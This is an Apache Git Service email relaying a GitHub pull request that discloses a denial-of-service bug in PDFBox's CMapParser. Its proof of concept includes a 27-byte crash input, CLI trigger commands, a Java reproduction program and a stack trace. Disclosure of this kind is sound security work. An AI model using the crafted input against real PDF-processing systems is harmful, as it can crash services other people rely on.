OwenSanzas opened a new pull request, #411:
URL: https://github.com/apache/pdfbox/pull/411
# ArrayIndexOutOfBoundsException in CMapParser.increment()
## Summary
CMapParser in Apache PDFBox's fontbox component does not properly validate
array bounds when processing bfrange mappings, causing an
`ArrayIndexOutOfBoundsException` when processing malformed CMap data with empty
hex strings.
**Type**: Array Index Out-of-Bounds (CWE-129)
**Severity**: Medium
**Impact**: Denial of Service (application crash)
**Affected Component**:
`fontbox/src/main/java/org/apache/fontbox/cmap/CMapParser.java:813`
## Root Cause
### Vulnerable Code (CMapParser.java:454-467)
```java
private void addMappingFrombfrange(CMap cmap, byte[] startCode, int values,
byte[] tokenBytes)
{
for (int i = 0; i < values; i++)
{
String value = createStringFromBytes(tokenBytes);
cmap.addCharMapping(startCode, value);
if (!increment(tokenBytes, tokenBytes.length - 1, strictMode))
{
break;
}
increment(startCode, startCode.length - 1, false); // passes -1
when length == 0
}
}
```
### Crash Location (CMapParser.java:813)
```java
private static boolean increment(byte[] data, int position, boolean
useStrictMode)
{
// ...
data[position] = (byte) (data[position] + 1); // CRASH: data[-1]
}
```
When malformed CMap data contains empty hex strings (`<>`), `startCode` is a
zero-length byte array. `startCode.length - 1` evaluates to -1, passed to
`increment()` which crashes accessing `data[-1]`. Both overloaded
`addMappingFrombfrange()` methods have this issue.
## PoC
### Trigger file
A crafted `malicious_cmap.pdf` with a Type0 font containing malformed CMap
bfrange data with empty hex strings.
### How to generate crash.bin
```bash
echo -n '0<>2.beginbfrange<><><2223' > crash.bin
```
**Content** (27 bytes): CMap fragment with empty start/end codes in bfrange
section.
### How to generate malicious_cmap.pdf
```bash
python3 create_malicious_pdf_cmap.py
```
---
## Trigger Method 1: Official pdfbox-app CLI
```bash
java -jar pdfbox-app-4.0.0-SNAPSHOT.jar export:text -i malicious_cmap.pdf -o
output.txt
```
**Output:**
```
java.lang.ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
at org.apache.fontbox.cmap.CMapParser.increment(CMapParser.java:813)
at
org.apache.fontbox.cmap.CMapParser.addMappingFrombfrange(CMapParser.java:466)
at
org.apache.fontbox.cmap.CMapParser.parseBeginbfrange(CMapParser.java:437)
at org.apache.fontbox.cmap.CMapParser.parse(CMapParser.java:118)
at
org.apache.pdfbox.pdmodel.font.CMapManager.parseCMap(CMapManager.java:72)
at org.apache.pdfbox.pdmodel.font.PDFont.readCMap(PDFont.java:221)
```
---
## Trigger Method 2: Direct API
```java
import org.apache.fontbox.cmap.CMap;
import org.apache.fontbox.cmap.CMapParser;
import org.apache.pdfbox.io.RandomAccessReadBuffer;
public class Reproduce {
public static void main(String[] args) throws Exception {
byte[] cmapData = "1 beginbfrange\n<> <> <2223>\nendbfrange"
.getBytes("US-ASCII");
CMapParser parser = new CMapParser();
CMap cmap = parser.parse(new RandomAccessReadBuffer(cmapData));
// ArrayIndexOutOfBoundsException: Index -1 out of bounds for length 0
}
}
```
---
## Impact
| Aspect | Details |
|--------|---------|
| **Type** | Denial of Service (DoS) |
| **Severity** | Medium |
| **Attack Vector** | Malicious PDF with crafted Type0 font (malformed CMap)
|
| **Payload Size** | 27 bytes |
| **Affected Operations** | Text extraction, rendering, any PDF processing
with Type0 fonts |
| **CWE** | CWE-129 (Improper Validation of Array Index) |
| **Related** | PDFBOX-6141, PDFBOX-6142 (related fixes, but this case not
covered) |
---
--
This is an automated message from the Apache Git Service.
To respond to the message, please log on to GitHub and use the
URL above to go to the specific comment.
To unsubscribe, e-mail: [email protected]
For queries about this service, please contact Infrastructure at:
[email protected]
---------------------------------------------------------------------
To unsubscribe, e-mail: [email protected]
For additional commands, e-mail: [email protected]